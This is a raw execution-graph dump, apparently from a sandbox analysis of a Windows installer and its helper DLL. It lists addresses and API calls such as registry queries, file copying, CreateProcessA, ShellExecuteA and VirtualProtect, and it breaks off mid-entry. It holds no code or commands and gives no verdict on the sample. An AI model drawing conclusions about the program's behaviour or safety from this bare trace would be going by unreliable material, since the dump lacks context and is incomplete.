                                                                                      execution_graph 4584 10001000 4587 1000101b 4584->4587 4594 100014d8 4587->4594 4589 10001020 4590 10001024 4589->4590 4591 10001027 GlobalAlloc 4589->4591 4592 100014ff 3 API calls 4590->4592 4591->4590 4593 10001019 4592->4593 4595 1000123b 3 API calls 4594->4595 4597 100014de 4595->4597 4596 100014e4 4596->4589 4597->4596 4598 100014f0 GlobalFree 4597->4598 4598->4589 4599 4019c0 4600 402a07 18 API calls 4599->4600 4601 4019c7 4600->4601 4602 402a07 18 API calls 4601->4602 4603 4019d0 4602->4603 4604 4019d7 lstrcmpiA 4603->4604 4605 4019e9 lstrcmpA 4603->4605 4606 4019dd 4604->4606 4605->4606 3565 4023c6 3576 402b11 3565->3576 3567 4023d0 3568 402a07 18 API calls 3567->3568 3569 4023d9 3568->3569 3570 4023e3 RegQueryValueExA 3569->3570 3574 40266d 3569->3574 3571 402409 RegCloseKey 3570->3571 3572 402403 3570->3572 3571->3574 3572->3571 3580 405ada wsprintfA 3572->3580 3577 402a07 18 API calls 3576->3577 3578 402b2a 3577->3578 3579 402b38 RegOpenKeyExA 3578->3579 3579->3567 3580->3571 4607 404646 4608 404649 4607->4608 4610 404689 4607->4610 4609 40140b 2 API calls 4608->4609 4614 404655 4609->4614 4611 405b9e 18 API calls 4610->4611 4612 4046c1 4611->4612 4613 405b9e 18 API calls 4612->4613 4615 4046cc 4613->4615 4616 405b9e 18 API calls 4615->4616 4617 4046fd lstrlenA wsprintfA SetDlgItemTextA 4616->4617 3581 404fc7 3582 405173 3581->3582 3583 404fe8 GetDlgItem GetDlgItem GetDlgItem 3581->3583 3585 40517c GetDlgItem CreateThread CloseHandle 3582->3585 3587 4051a4 3582->3587 3628 403ec1 SendMessageA 3583->3628 3585->3587 3662 404f5b OleInitialize 3585->3662 3586 405059 3593 405060 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3586->3593 3588 4051cf 3587->3588 3589 4051f1 3587->3589 3590 4051bb ShowWindow ShowWindow 3587->3590 3591 4051d8 3588->3591 3592 40522d 3588->3592 3637 403ef3 3589->3637 3633 403ec1 SendMessageA 3590->3633 3595 4051e0 3591->3595 3596 405206 ShowWindow 3591->3596 3592->3589 3603 405238 SendMessageA 3592->3603 3601 4050b3 SendMessageA SendMessageA 3593->3601 3602 4050cf 3593->3602 3634 403e65 3595->3634 3599 405226 3596->3599 3600 405218 3596->3600 3598 4051ff 3606 403e65 SendMessageA 3599->3606 3651 404e89 3600->3651 3601->3602 3607 4050e2 3602->3607 3608 4050d4 SendMessageA 3602->3608 3603->3598 3609 405251 CreatePopupMenu 3603->3609 3606->3592 3629 403e8c 3607->3629 3608->3607 3610 405b9e 18 API calls 3609->3610 3612 405261 AppendMenuA 3610->3612 3614 405274 GetWindowRect 3612->3614 3615 405287 3612->3615 3613 4050f2 3616 4050fb ShowWindow 3613->3616 3617 40512f GetDlgItem SendMessageA 3613->3617 3619 405290 TrackPopupMenu 3614->3619 3615->3619 3620 405111 ShowWindow 3616->3620 3621 40511e 3616->3621 3617->3598 3618 405156 SendMessageA SendMessageA 3617->3618 3618->3598 3619->3598 3622 4052ae 3619->3622 3620->3621 3632 403ec1 SendMessageA 3621->3632 3623 4052ca SendMessageA 3622->3623 3623->3623 3625 4052e7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3623->3625 3626 405309 SendMessageA 3625->3626 3626->3626 3627 40532b GlobalUnlock SetClipboardData CloseClipboard 3626->3627 3627->3598 3628->3586 3630 405b9e 18 API calls 3629->3630 3631 403e97 SetDlgItemTextA 3630->3631 3631->3613 3632->3617 3633->3588 3635 403e72 SendMessageA 3634->3635 3636 403e6c 3634->3636 3635->3589 3636->3635 3638 403f0b GetWindowLongA 3637->3638 3648 403f94 3637->3648 3639 403f1c 3638->3639 3638->3648 3640 403f2b GetSysColor 3639->3640 3641 403f2e 3639->3641 3640->3641 3642 403f34 SetTextColor 3641->3642 3643 403f3e SetBkMode 3641->3643 3642->3643 3644 403f56 GetSysColor 3643->3644 3645 403f5c 3643->3645 3644->3645 3646 403f63 SetBkColor 3645->3646 3647 403f6d 3645->3647 3646->3647 3647->3648 3649 403f80 DeleteObject 3647->3649 3650 403f87 CreateBrushIndirect 3647->3650 3648->3598 3649->3650 3650->3648 3652 404ea4 3651->3652 3661 404f47 3651->3661 3653 404ec1 lstrlenA 3652->3653 3654 405b9e 18 API calls 3652->3654 3655 404eea 3653->3655 3656 404ecf lstrlenA 3653->3656 3654->3653 3658 404ef0 SetWindowTextA 3655->3658 3659 404efd 3655->3659 3657 404ee1 lstrcatA 3656->3657 3656->3661 3657->3655 3658->3659 3660 404f03 SendMessageA SendMessageA SendMessageA 3659->3660 3659->3661 3660->3661 3661->3599 3669 403ed8 3662->3669 3664 403ed8 SendMessageA 3666 404fb7 OleUninitialize 3664->3666 3665 404f7e 3668 404fa5 3665->3668 3672 401389 3665->3672 3668->3664 3670 403ef0 3669->3670 3671 403ee1 SendMessageA 3669->3671 3670->3665 3671->3670 3674 401390 3672->3674 3673 4013fe 3673->3665 3674->3673 3675 4013cb MulDiv SendMessageA 3674->3675 3675->3674 4621 4042ca 4622 4042f6 4621->4622 4623 404307 4621->4623 4682 405391 GetDlgItemTextA 4622->4682 4625 404313 GetDlgItem 4623->4625 4628 404372 4623->4628 4627 404327 4625->4627 4626 404301 4630 405de7 5 API calls 4626->4630 4631 40433b SetWindowTextA 4627->4631 4634 4056c2 4 API calls 4627->4634 4629 404456 4628->4629 4636 405b9e 18 API calls 4628->4636 4680 4045f1 4628->4680 4629->4680 4684 405391 GetDlgItemTextA 4629->4684 4630->4623 4635 403e8c 19 API calls 4631->4635 4633 403ef3 8 API calls 4638 404605 4633->4638 4639 404331 4634->4639 4640 404357 4635->4640 4641 4043e6 SHBrowseForFolderA 4636->4641 4637 404486 4642 405717 18 API calls 4637->4642 4639->4631 4648 405629 3 API calls 4639->4648 4643 403e8c 19 API calls 4640->4643 4641->4629 4644 4043fe CoTaskMemFree 4641->4644 4647 40448c 4642->4647 4645 404365 4643->4645 4646 405629 3 API calls 4644->4646 4683 403ec1 SendMessageA 4645->4683 4650 40440b 4646->4650 4685 405b7c lstrcpynA 4647->4685 4648->4631 4653 404442 SetDlgItemTextA 4650->4653 4657 405b9e 18 API calls 4650->4657 4652 40436b 4655 405ea7 3 API calls 4652->4655 4653->4629 4654 4044a3 4656 405ea7 3 API calls 4654->4656 4655->4628 4664 4044ab 4656->4664 4658 40442a lstrcmpiA 4657->4658 4658->4653 4661 40443b lstrcatA 4658->4661 4659 4044e5 4686 405b7c lstrcpynA 4659->4686 4661->4653 4662 4044ec 4663 4056c2 4 API calls 4662->4663 4665 4044f2 GetDiskFreeSpaceA 4663->4665 4664->4659 4668 405670 2 API calls 4664->4668 4670 404536 4664->4670 4667 404514 MulDiv 4665->4667 4665->4670 4667->4670 4668->4664 4669 4045a0 4672 4045c3 4669->4672 4674 40140b 2 API calls 4669->4674 4670->4669 4687 404672 4670->4687 4695 403eae KiUserCallbackDispatcher 4672->4695 4673 404592 4675 4045a2 SetDlgItemTextA 4673->4675 4676 404597 4673->4676 4674->4672 4675->4669 4679 404672 21 API calls 4676->4679 4678 4045df 4678->4680 4696 40425f 4678->4696 4679->4669 4680->4633 4682->4626 4683->4652 4684->4637 4685->4654 4686->4662 4688 404689 4687->4688 4689 405b9e 18 API calls 4688->4689 4690 4046c1 4689->4690 4691 405b9e 18 API calls 4690->4691 4692 4046cc 4691->4692 4693 405b9e 18 API calls 4692->4693 4694 4046fd lstrlenA wsprintfA SetDlgItemTextA 4693->4694 4694->4673 4695->4678 4697 404272 SendMessageA 4696->4697 4698 40426d 4696->4698 4697->4680 4698->4697 4699 401ccc GetDlgItem GetClientRect 4700 402a07 18 API calls 4699->4700 4701 401cfc LoadImageA SendMessageA 4700->4701 4702 401d1a DeleteObject 4701->4702 4703 40289c 4701->4703 4702->4703 3694 4024cf 3695 4024d4 3694->3695 3696 4024e5 3694->3696 3703 4029ea 3695->3703 3697 402a07 18 API calls 3696->3697 3699 4024ec lstrlenA 3697->3699 3700 4024db 3699->3700 3701 40250b WriteFile 3700->3701 3702 40266d 3700->3702 3701->3702 3704 405b9e 18 API calls 3703->3704 3705 4029fe 3704->3705 3705->3700 4704 40264f 4705 402a07 18 API calls 4704->4705 4706 402656 FindFirstFileA 4705->4706 4707 402679 4706->4707 4711 402669 4706->4711 4712 405ada wsprintfA 4707->4712 4709 402680 4713 405b7c lstrcpynA 4709->4713 4712->4709 4713->4711 4714 401650 4715 402a07 18 API calls 4714->4715 4716 401657 4715->4716 4717 402a07 18 API calls 4716->4717 4718 401660 4717->4718 4719 402a07 18 API calls 4718->4719 4720 401669 MoveFileA 4719->4720 4721 401675 4720->4721 4722 40167c 4720->4722 4724 401423 25 API calls 4721->4724 4723 405e80 2 API calls 4722->4723 4726 40217f 4722->4726 4725 40168b 4723->4725 4724->4726 4725->4726 4727 405a30 40 API calls 4725->4727 4727->4721 4728 10002110 4729 10002175 4728->4729 4731 100021ab 4728->4731 4730 10002187 GlobalAlloc 4729->4730 4729->4731 4730->4729 4732 404754 SendMessageA 4733 4047b3 SendMessageA 4732->4733 4734 404777 GetMessagePos ScreenToClient SendMessageA 4732->4734 4736 4047ab 4733->4736 4735 4047b0 4734->4735 4734->4736 4735->4733 4737 4047d4 4746 405b7c lstrcpynA 4737->4746 4739 4047e7 4747 405ada wsprintfA 4739->4747 4741 4047f1 4742 40140b 2 API calls 4741->4742 4743 4047fa 4742->4743 4748 405b7c lstrcpynA 4743->4748 4745 404801 4746->4739 4747->4741 4748->4745 3710 4014d6 3711 4029ea 18 API calls 3710->3711 3712 4014dc Sleep 3711->3712 3714 40289c 3712->3714 3725 401dd8 3726 402a07 18 API calls 3725->3726 3727 401dde 3726->3727 3728 402a07 18 API calls 3727->3728 3729 401de7 3728->3729 3730 402a07 18 API calls 3729->3730 3731 401df0 3730->3731 3732 402a07 18 API calls 3731->3732 3733 401df9 3732->3733 3737 401423 3733->3737 3736 401e2d 3738 404e89 25 API calls 3737->3738 3739 401431 ShellExecuteA 3738->3739 3739->3736 3782 40155b 3783 401577 ShowWindow 3782->3783 3784 40157e 3782->3784 3783->3784 3785 40158c ShowWindow 3784->3785 3786 40289c 3784->3786 3785->3786 4749 401edc 4750 402a07 18 API calls 4749->4750 4751 401ee3 GetFileVersionInfoSizeA 4750->4751 4752 401f06 GlobalAlloc 4751->4752 4755 401f5c 4751->4755 4753 401f1a GetFileVersionInfoA 4752->4753 4752->4755 4754 401f2b VerQueryValueA 4753->4754 4753->4755 4754->4755 4756 401f44 4754->4756 4760 405ada wsprintfA 4756->4760 4758 401f50 4761 405ada wsprintfA 4758->4761 4760->4758 4761->4755 4767 401b63 4768 401b6e 4767->4768 4769 40266d 4767->4769 4772 405b7c lstrcpynA 4768->4772 4771 401b78 GlobalFree 4771->4769 4772->4771 4773 4035e5 4774 4035f0 4773->4774 4775 4035f4 4774->4775 4776 4035f7 GlobalAlloc 4774->4776 4776->4775 3908 4025e6 3909 4025eb 3908->3909 3910 4025f6 SetFilePointer 3909->3910 3911 402606 3910->3911 3913 402849 3910->3913 3914 405ada wsprintfA 3911->3914 3914->3913 3915 401f68 3916 401f7a 3915->3916 3918 402028 3915->3918 3917 402a07 18 API calls 3916->3917 3919 401f81 3917->3919 3920 401423 25 API calls 3918->3920 3921 402a07 18 API calls 3919->3921 3926 40217f 3920->3926 3922 401f8a 3921->3922 3923 401f92 GetModuleHandleA 3922->3923 3924 401f9f LoadLibraryExA 3922->3924 3923->3924 3925 401faf GetProcAddress 3923->3925 3924->3918 3924->3925 3927 401ffb 3925->3927 3928 401fbe 3925->3928 3929 404e89 25 API calls 3927->3929 3930 401fc6 3928->3930 3931 401fdd 3928->3931 3932 401fce 3929->3932 3933 401423 25 API calls 3930->3933 3936 100016da 3931->3936 3932->3926 3934 40201c FreeLibrary 3932->3934 3933->3932 3934->3926 3937 1000170a 3936->3937 3979 10001a86 3937->3979 3939 10001711 3940 10001827 3939->3940 3941 10001722 3939->3941 3942 10001729 3939->3942 3940->3932 4028 10002165 3941->4028 4010 100021af 3942->4010 3947 1000178d 3951 10001793 3947->3951 3952 100017cf 3947->3952 3948 1000176f 4041 1000236d 3948->4041 3949 10001758 3953 1000175d 3949->3953 3962 1000174e 3949->3962 3950 1000173f 3955 10001745 3950->3955 3961 10001750 3950->3961 3957 10001576 3 API calls 3951->3957 3959 1000236d 14 API calls 3952->3959 4038 10002a57 3953->4038 3955->3962 4022 1000279c 3955->4022 3964 100017a9 3957->3964 3969 100017c1 3959->3969 4032 10002540 3961->4032 3962->3947 3962->3948 3966 1000236d 14 API calls 3964->3966 3966->3969 3971 100017d6 3969->3971 3970 10001816 3970->3940 3973 10001820 GlobalFree 3970->3973 3971->3970 4065 10002333 3971->4065 3973->3940 3976 10001802 3976->3970 4069 100014ff wsprintfA 3976->4069 3977 100017fb FreeLibrary 3977->3976 4072 10001215 GlobalAlloc 3979->4072 3981 10001aaa 4073 10001215 GlobalAlloc 3981->4073 3983 10001ab5 4074 1000123b 3983->4074 3985 10001cc5 GlobalFree GlobalFree GlobalFree 3986 10001ce2 3985->3986 4002 10001d2c 3985->4002 3987 1000201b 3986->3987 3995 10001cf7 3986->3995 3986->4002 3989 1000203c GetModuleHandleA 3987->3989 3987->4002 3988 10001b6f GlobalAlloc 4008 10001abd 3988->4008 3990 1000204d LoadLibraryA 3989->3990 3991 1000205e 3989->3991 3990->3991 3990->4002 4085 100015c1 GetProcAddress 3991->4085 3992 10001bbe lstrcpyA 3996 10001bc8 lstrcpyA 3992->3996 3993 10001be3 GlobalFree 3993->4008 3995->4002 4081 10001224 3995->4081 3996->4008 3997 10002070 3998 10002081 lstrlenA 3997->3998 3997->4002 4086 100015c1 GetProcAddress 3998->4086 4001 10001fbf lstrcpyA 4001->4008 4002->3939 4003 1000209a 4003->4002 4005 10001c25 4005->4008 4079 10001551 GlobalSize GlobalAlloc 4005->4079 4006 10001e78 GlobalFree 4006->4008 4008->3985 4008->3988 4008->3992 4008->3993 4008->3996 4008->4001 4008->4005 4008->4006 4009 10001224 2 API calls 4008->4009 4084 10001215 GlobalAlloc 4008->4084 4009->4008 4016 100021c7 4010->4016 4011 10001224 GlobalAlloc lstrcpynA 4011->4016 4012 1000123b 3 API calls 4012->4016 4014 100022fc GlobalFree 4015 1000172f 4014->4015 4014->4016 4015->3949 4015->3950 4015->3962 4016->4011 4016->4012 4016->4014 4017 10002284 GlobalAlloc MultiByteToWideChar 4016->4017 4018 10002263 lstrlenA 4016->4018 4089 100012bf 4016->4089 4019 10002272 4017->4019 4020 100022ae GlobalAlloc CLSIDFromString GlobalFree 4017->4020 4018->4014 4018->4019 4019->4014 4094 100024d4 4019->4094 4020->4014 4023 100027ae 4022->4023 4024 10002853 VirtualAlloc 4023->4024 4025 10002871 4024->4025 4026 10002962 GetLastError 4025->4026 4027 1000296d 4025->4027 4026->4027 4027->3962 4029 10002175 4028->4029 4031 10001728 4028->4031 4030 10002187 GlobalAlloc 4029->4030 4029->4031 4030->4029 4031->3942 4035 1000255c 4032->4035 4033 100025c0 4036 100025c5 GlobalSize 4033->4036 4037 100025cf 4033->4037 4034 100025ad GlobalAlloc 4034->4037 4035->4033 4035->4034 4036->4037 4037->3962 4039 10002a62 4038->4039 4040 10002aa2 GlobalFree 4039->4040 4045 10002388 4041->4045 4043 1000246c lstrcpyA 4043->4045 4044 100023cc wsprintfA 4044->4045 4045->4043 4045->4044 4046 10002444 lstrcpynA 4045->4046 4047 1000248d GlobalFree 4045->4047 4048 100024b6 GlobalFree 4045->4048 4050 10002421 WideCharToMultiByte 4045->4050 4051 100023e0 GlobalAlloc StringFromGUID2 WideCharToMultiByte GlobalFree 4045->4051 4052 10001278 2 API calls 4045->4052 4097 10001215 GlobalAlloc 4045->4097 4098 100012e8 4045->4098 4046->4045 4047->4045 4048->4045 4049 10001775 4048->4049 4054 10001576 4049->4054 4050->4045 4051->4045 4052->4045 4102 10001215 GlobalAlloc 4054->4102 4056 1000157c 4057 10001589 lstrcpyA 4056->4057 4058 100015a3 4056->4058 4060 100015bd 4057->4060 4058->4060 4061 100015a8 wsprintfA 4058->4061 4062 10001278 4060->4062 4061->4060 4063 10001281 GlobalAlloc lstrcpynA 4062->4063 4064 100012ba GlobalFree 4062->4064 4063->4064 4064->3971 4066 10002341 4065->4066 4067 100017e2 4065->4067 4066->4067 4068 1000235a GlobalFree 4066->4068 4067->3976 4067->3977 4068->4066 4070 10001278 2 API calls 4069->4070 4071 10001520 4070->4071 4071->3970 4072->3981 4073->3983 4075 10001274 4074->4075 4076 10001245 4074->4076 4075->4008 4076->4075 4087 10001215 GlobalAlloc 4076->4087 4078 10001251 lstrcpyA GlobalFree 4078->4008 4080 1000156f 4079->4080 4080->4005 4088 10001215 GlobalAlloc 4081->4088 4083 10001233 lstrcpynA 4083->4002 4084->4008 4085->3997 4086->4003 4087->4078 4088->4083 4090 100012e3 4089->4090 4091 100012c7 4089->4091 4090->4090 4091->4090 4092 10001224 2 API calls 4091->4092 4093 100012e1 4092->4093 4093->4016 4095 100024e2 VirtualAlloc 4094->4095 4096 10002538 4094->4096 4095->4096 4096->4019 4097->4045 4099 100012f1 4098->4099 4100 10001316 4098->4100 4099->4100 4101 100012fd lstrcpyA 4099->4101 4100->4045 4101->4100 4102->4056 4777 1000182a 4778 1000123b 3 API calls 4777->4778 4779 10001850 4778->4779 4780 1000123b 3 API calls 4779->4780 4781 10001858 4780->4781 4782 1000123b 3 API calls 4781->4782 4785 10001895 4781->4785 4783 1000187a 4782->4783 4784 10001883 GlobalFree 4783->4784 4784->4785 4786 10001278 2 API calls 4785->4786 4787 10001a0c GlobalFree GlobalFree 4786->4787 4121 4030ef #17 SetErrorMode OleInitialize 4122 405ea7 3 API calls 4121->4122 4123 403134 SHGetFileInfoA 4122->4123 4194 405b7c lstrcpynA 4123->4194 4125 40315f GetCommandLineA 4195 405b7c lstrcpynA 4125->4195 4127 403171 GetModuleHandleA 4128 403188 4127->4128 4129 405654 CharNextA 4128->4129 4130 40319c CharNextA 4129->4130 4139 4031ac 4130->4139 4131 403276 4132 403289 GetTempPathA 4131->4132 4196 4030bb 4132->4196 4134 4032a1 4135 4032a5 GetWindowsDirectoryA lstrcatA 4134->4135 4136 4032fb DeleteFileA 4134->4136 4138 4030bb 11 API calls 4135->4138 4204 402c33 GetTickCount GetModuleFileNameA 4136->4204 4137 405654 CharNextA 4137->4139 4141 4032c1 4138->4141 4139->4131 4139->4137 4142 403278 4139->4142 4141->4136 4144 4032c5 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4141->4144 4286 405b7c lstrcpynA 4142->4286 4143 40330f 4150 405654 CharNextA 4143->4150 4179 403395 4143->4179 4189 4033a5 4143->4189 4146 4030bb 11 API calls 4144->4146 4148 4032f3 4146->4148 4148->4136 4148->4189 4152 40332a 4150->4152 4158 403370 4152->4158 4159 4033d4 lstrcatA lstrcmpiA 4152->4159 4153 4034b2 4156 403535 ExitProcess 4153->4156 4160 405ea7 3 API calls 4153->4160 4154 4033be 4296 4053ad 4154->4296 4162 405717 18 API calls 4158->4162 4163 4033f0 CreateDirectoryA SetCurrentDirectoryA 4159->4163 4159->4189 4164 4034c1 4160->4164 4165 40337b 4162->4165 4166 403412 4163->4166 4167 403407 4163->4167 4168 405ea7 3 API calls 4164->4168 4165->4189 4287 405b7c lstrcpynA 4165->4287 4301 405b7c lstrcpynA 4166->4301 4300 405b7c lstrcpynA 4167->4300 4171 4034ca 4168->4171 4173 405ea7 3 API calls 4171->4173 4174 4034d3 4173->4174 4176 403521 ExitWindowsEx 4174->4176 4182 4034e1 GetCurrentProcess 4174->4182 4175 40338a 4288 405b7c lstrcpynA 4175->4288 4176->4156 4180 40352e 4176->4180 4178 405b9e 18 API calls 4181 403451 DeleteFileA 4178->4181 4232 403627 4179->4232 4305 40140b 4180->4305 4184 40345e CopyFileA 4181->4184 4191 403420 4181->4191 4186 4034f1 4182->4186 4184->4191 4185 4034a6 4187 405a30 40 API calls 4185->4187 4186->4176 4187->4189 4188 405a30 40 API calls 4188->4191 4289 40354d 4189->4289 4190 405b9e 18 API calls 4190->4191 4191->4178 4191->4185 4191->4188 4191->4190 4193 403492 CloseHandle 4191->4193 4302 40534c CreateProcessA 4191->4302 4193->4191 4194->4125 4195->4127 4197 405de7 5 API calls 4196->4197 4199 4030c7 4197->4199 4198 4030d1 4198->4134 4199->4198 4200 405629 3 API calls 4199->4200 4201 4030d9 CreateDirectoryA 4200->4201 4202 405859 2 API calls 4201->4202 4203 4030ed 4202->4203 4203->4134 4308 40582a GetFileAttributesA CreateFileA 4204->4308 4206 402c73 4231 402c83 4206->4231 4309 405b7c lstrcpynA 4206->4309 4208 402c99 4209 405670 2 API calls 4208->4209 4210 402c9f 4209->4210 4310 405b7c lstrcpynA 4210->4310 4212 402caa GetFileSize 4213 402cc1 4212->4213 4228 402da6 4212->4228 4216 403072 ReadFile 4213->4216 4219 402e12 4213->4219 4227 402bcf 6 API calls 4213->4227 4213->4228 4213->4231 4215 402daf 4217 402ddf GlobalAlloc 4215->4217 4215->4231 4322 4030a4 SetFilePointer 4215->4322 4216->4213 4323 4030a4 SetFilePointer 4217->4323 4223 402bcf 6 API calls 4219->4223 4221 402dc8 4224 403072 ReadFile 4221->4224 4222 402dfa 4225 402e6c 33 API calls 4222->4225 4223->4231 4226 402dd3 4224->4226 4229 402e06 4225->4229 4226->4217 4226->4231 4227->4213 4311 402bcf 4228->4311 4229->4229 4230 402e43 SetFilePointer 4229->4230 4229->4231 4230->4231 4231->4143 4233 405ea7 3 API calls 4232->4233 4234 40363b 4233->4234 4235 403641 4234->4235 4236 403653 4234->4236 4337 405ada wsprintfA 4235->4337 4237 405a63 3 API calls 4236->4237 4238 40367e 4237->4238 4240 40369c lstrcatA 4238->4240 4242 405a63 3 API calls 4238->4242 4241 403651 4240->4241 4328 4038ec 4241->4328 4242->4240 4245 405717 18 API calls 4246 4036ce 4245->4246 4247 403757 4246->4247 4249 405a63 3 API calls 4246->4249 4248 405717 18 API calls 4247->4248 4250 40375d 4248->4250 4251 4036fa 4249->4251 4252 40376d LoadImageA 4250->4252 4253 405b9e 18 API calls 4250->4253 4251->4247 4256 403716 lstrlenA 4251->4256 4259 405654 CharNextA 4251->4259 4254 403813 4252->4254 4255 403794 RegisterClassA 4252->4255 4253->4252 4258 40140b 2 API calls 4254->4258 4257 4037ca SystemParametersInfoA CreateWindowExA 4255->4257 4285 40381d 4255->4285 4260 403724 lstrcmpiA 4256->4260 4261 40374a 4256->4261 4257->4254 4262 403819 4258->4262 4263 403714 4259->4263 4260->4261 4264 403734 GetFileAttributesA 4260->4264 4265 405629 3 API calls 4261->4265 4268 4038ec 19 API calls 4262->4268 4262->4285 4263->4256 4267 403740 4264->4267 4266 403750 4265->4266 4338 405b7c lstrcpynA 4266->4338 4267->4261 4271 405670 2 API calls 4267->4271 4269 40382a 4268->4269 4272 403836 ShowWindow LoadLibraryA 4269->4272 4273 4038b9 4269->4273 4271->4261 4274 403855 LoadLibraryA 4272->4274 4275 40385c GetClassInfoA 4272->4275 4276 404f5b 5 API calls 4273->4276 4274->4275 4277 403870 GetClassInfoA RegisterClassA 4275->4277 4278 403886 DialogBoxParamA 4275->4278 4279 4038bf 4276->4279 4277->4278 4280 40140b 2 API calls 4278->4280 4281 4038c3 4279->4281 4282 4038db 4279->4282 4280->4285 4284 40140b 2 API calls 4281->4284 4281->4285 4283 40140b 2 API calls 4282->4283 4283->4285 4284->4285 4285->4189 4286->4132 4287->4175 4288->4179 4290 403565 4289->4290 4291 403557 CloseHandle 4289->4291 4340 403592 4290->4340 4291->4290 4294 405459 71 API calls 4295 4033ae OleUninitialize 4294->4295 4295->4153 4295->4154 4297 4053c2 4296->4297 4298 4033cc ExitProcess 4297->4298 4299 4053d6 MessageBoxIndirectA 4297->4299 4299->4298 4300->4166 4301->4191 4303 405387 4302->4303 4304 40537b CloseHandle 4302->4304 4303->4191 4304->4303 4306 401389 2 API calls 4305->4306 4307 401420 4306->4307 4307->4156 4308->4206 4309->4208 4310->4212 4312 402bf0 4311->4312 4313 402bd8 4311->4313 4316 402c00 GetTickCount 4312->4316 4317 402bf8 4312->4317 4314 402be1 DestroyWindow 4313->4314 4315 402be8 4313->4315 4314->4315 4315->4215 4319 402c31 4316->4319 4320 402c0e CreateDialogParamA ShowWindow 4316->4320 4324 405ee0 4317->4324 4319->4215 4320->4319 4322->4221 4323->4222 4325 405efd PeekMessageA 4324->4325 4326 405ef3 DispatchMessageA 4325->4326 4327 402bfe 4325->4327 4326->4325 4327->4215 4329 403900 4328->4329 4339 405ada wsprintfA 4329->4339 4331 403971 4332 405b9e 18 API calls 4331->4332 4333 40397d SetWindowTextA 4332->4333 4334 4036ac 4333->4334 4335 403999 4333->4335 4334->4245 4335->4334 4336 405b9e 18 API calls 4335->4336 4336->4335 4337->4241 4338->4247 4339->4331 4341 4035a0 4340->4341 4342 40356a 4341->4342 4343 4035a5 FreeLibrary GlobalFree 4341->4343 4342->4294 4343->4342 4343->4343 4788 4018f0 4789 4053ad MessageBoxIndirectA 4788->4789 4790 4018f6 4789->4790 4791 401af0 4792 402a07 18 API calls 4791->4792 4793 401af7 4792->4793 4794 4029ea 18 API calls 4793->4794 4795 401b00 wsprintfA 4794->4795 4796 40289c 4795->4796 4344 4019f1 4345 402a07 18 API calls 4344->4345 4346 4019fa ExpandEnvironmentStringsA 4345->4346 4347 401a0e 4346->4347 4349 401a21 4346->4349 4348 401a13 lstrcmpA 4347->4348 4347->4349 4348->4349 4797 4014f3 SetForegroundWindow 4798 40289c 4797->4798 4799 402877 SendMessageA 4800 402891 InvalidateRect 4799->4800 4801 40289c 4799->4801 4800->4801 4802 10001637 4803 10001666 4802->4803 4804 10001a86 19 API calls 4803->4804 4805 1000166d 4804->4805 4806 10001680 4805->4806 4807 10001674 4805->4807 4809 100016a7 4806->4809 4810 1000168a 4806->4810 4808 10001278 2 API calls 4807->4808 4816 1000167e 4808->4816 4811 100016d1 4809->4811 4812 100016ad 4809->4812 4813 100014ff 3 API calls 4810->4813 4815 100014ff 3 API calls 4811->4815 4814 10001576 3 API calls 4812->4814 4817 1000168f 4813->4817 4818 100016b2 4814->4818 4815->4816 4819 10001576 3 API calls 4817->4819 4820 10001278 2 API calls 4818->4820 4821 10001695 4819->4821 4822 100016b8 GlobalFree 4820->4822 4823 10001278 2 API calls 4821->4823 4822->4816 4825 100016cc GlobalFree 4822->4825 4824 1000169b GlobalFree 4823->4824 4824->4816 4825->4816 4826 401c78 4827 4029ea 18 API calls 4826->4827 4828 401c7e IsWindow 4827->4828 4829 4019e1 4828->4829 4834 40227d 4835 402a07 18 API calls 4834->4835 4836 40228e 4835->4836 4837 402a07 18 API calls 4836->4837 4838 402297 4837->4838 4839 402a07 18 API calls 4838->4839 4840 4022a1 GetPrivateProfileStringA 4839->4840 4841 1000103d 4842 1000101b 8 API calls 4841->4842 4843 10001056 4842->4843 4844 4014fe 4845 401506 4844->4845 4847 401519 4844->4847 4846 4029ea 18 API calls 4845->4846 4846->4847 3510 100026c2 3511 10002712 3510->3511 3512 100026d2 VirtualProtect 3510->3512 3512->3511 3513 401705 3519 402a07 3513->3519 3516 4027c7 3517 401727 3517->3516 3525 405b7c lstrcpynA 3517->3525 3520 402a13 3519->3520 3526 405b9e 3520->3526 3522 40170c SearchPathA 3522->3516 3522->3517 3525->3516 3542 405bab 3526->3542 3527 405dce 3528 402a34 3527->3528 3560 405b7c lstrcpynA 3527->3560 3528->3522 3544 405de7 3528->3544 3530 405c4c GetVersion 3530->3542 3531 405da5 lstrlenA 3531->3542 3532 405b9e 10 API calls 3532->3531 3536 405cc4 GetSystemDirectoryA 3536->3542 3537 405cd7 GetWindowsDirectoryA 3537->3542 3538 405de7 5 API calls 3538->3542 3539 405b9e 10 API calls 3539->3542 3540 405d4e lstrcatA 3540->3542 3541 405d0b SHGetSpecialFolderLocation 3541->3542 3543 405d23 SHGetPathFromIDListA CoTaskMemFree 3541->3543 3542->3527 3542->3530 3542->3531 3542->3532 3542->3536 3542->3537 3542->3538 3542->3539 3542->3540 3542->3541 3553 405a63 RegOpenKeyExA 3542->3553 3558 405ada wsprintfA 3542->3558 3559 405b7c lstrcpynA 3542->3559 3543->3542 3545 405df3 3544->3545 3547 405e50 CharNextA 3545->3547 3549 405e5b 3545->3549 3551 405e3e CharNextA 3545->3551 3552 405e4b CharNextA 3545->3552 3561 405654 3545->3561 3546 405e5f CharPrevA 3546->3549 3547->3545 3547->3549 3549->3546 3550 405e7a 3549->3550 3550->3522 3551->3545 3552->3547 3554 405ad4 3553->3554 3555 405a96 RegQueryValueExA 3553->3555 3554->3542 3556 405ab7 RegCloseKey 3555->3556 3556->3554 3558->3542 3559->3542 3560->3528 3562 40565a 3561->3562 3563 40566d 3562->3563 3564 405660 CharNextA 3562->3564 3563->3545 3564->3562 3676 402188 3677 402a07 18 API calls 3676->3677 3678 40218e 3677->3678 3679 402a07 18 API calls 3678->3679 3680 402197 3679->3680 3681 402a07 18 API calls 3680->3681 3682 4021a0 3681->3682 3691 405e80 FindFirstFileA 3682->3691 3685 4021ba lstrlenA lstrlenA 3688 404e89 25 API calls 3685->3688 3686 4021ad 3687 404e89 25 API calls 3686->3687 3689 4021b5 3686->3689 3687->3689 3690 4021f6 SHFileOperationA 3688->3690 3690->3686 3690->3689 3692 4021a9 3691->3692 3693 405e96 FindClose 3691->3693 3692->3685 3692->3686 3693->3692 4848 404e88 4849 404ea4 4848->4849 4858 404f47 4848->4858 4850 404ec1 lstrlenA 4849->4850 4851 405b9e 18 API calls 4849->4851 4852 